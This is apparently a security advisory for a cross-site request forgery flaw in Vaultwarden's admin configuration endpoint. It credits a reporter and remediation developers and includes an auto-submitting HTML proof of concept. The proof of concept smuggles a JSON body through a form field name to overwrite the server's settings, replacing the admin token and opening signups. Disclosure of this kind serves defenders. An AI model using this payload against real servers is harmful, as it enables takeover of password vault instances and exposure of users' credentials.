Attacker can create malicious html page that sends http request to the vaultwarden admin page for change.
HTTP server doesn't verify Content-Type header. This requires the DISABLE_ADMIN_TOKEN option to be enabled, as the authentication cookie will not be sent across site boundaries.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form action="http://0.0.0.0:8083/admin/config" method="POST" enctype="text/plain">
<input type="text" name='{"sends_allowed":true,"disable_icon_download":false,"signups_allowed":true,"signups_verify":false,"invitations_allowed":true,"emergency_access_allowed":true,"email_change_allowed":true,"password_hints_allowed":true,"show_password_hint":false,"http_request_block_non_global_ips":true,"disable_2fa_remember":false,"authenticator_disable_time_drift":false,"require_device_email":false,"reload_templates":false,"increase_note_size_limit":false,"_enable_yubico":true,"_enable_duo":true,"_enable_smtp":true,"use_sendmail":false,"smtp_embed_images":true,"smtp_accept_invalid_certs":false,"smtp_accept_invalid_hostnames":false,"_enable_email_2fa":false,"email_2fa_enforce_on_verified_invite":false,"email_2fa_auto_fallback":false,"user_attachment_limit":null,"org_attachment_limit":null,"user_send_limit":null,"trash_auto_delete_days":null,"incomplete_2fa_time_limit":3,"signups_verify_resend_time":3600,"signups_verify_resend_limit":6,"password_iterations":600000,"icon_redirect_code":302,"icon_cache_ttl":2592000,"icon_cache_negttl":259200,"icon_download_timeout":10,"admin_session_lifetime":20,"smtp_port":587,"smtp_timeout":15,"email_token_size":6,"email_expiration_time":600,"email_attempts_limit":3,"domain":"http://localhost/","hibp_api_key":null,"signups_domains_whitelist":null,"org_creation_users":null,"admin_token":"TEST_ADMIN_TOKEN","invitation_org_name":"Vaultwarden","ip_header":"X-Real-IP","http_request_block_regex":null,"log_timestamp_format":"%Y-%m-%d %H:%M:%S.%3f","allowed_iframe_ancestors":null,"allowed_connect_src":null,"yubico_client_id":null,"yubico_secret_key":null,"yubico_server":null,"duo_ikey":null,"duo_skey":null,"duo_host":null,"sendmail_command":null,"smtp_host":null,"smtp_security":"starttls","smtp_from":null,"smtp_from_name":"Vaultwarden","smtp_username":null,"smtp_password":null,"smtp_auth_mechanism":null,"helo_name":null,"test": "' value='a"}'>
<input type="submit">
</form>
<script>
document.forms[0].submit()
</script>
</body>
</html>
ElizarBatin Reporter
BlackDex Remediation developer
dani-garcia Remediation reviewer
Summary
Attacker can create malicious html page that sends http request to the vaultwarden admin page for change.
HTTP server doesn't verify
Content-Typeheader. This requires theDISABLE_ADMIN_TOKENoption to be enabled, as the authentication cookie will not be sent across site boundaries.PoC
Following html code will change the PIN after victim visit: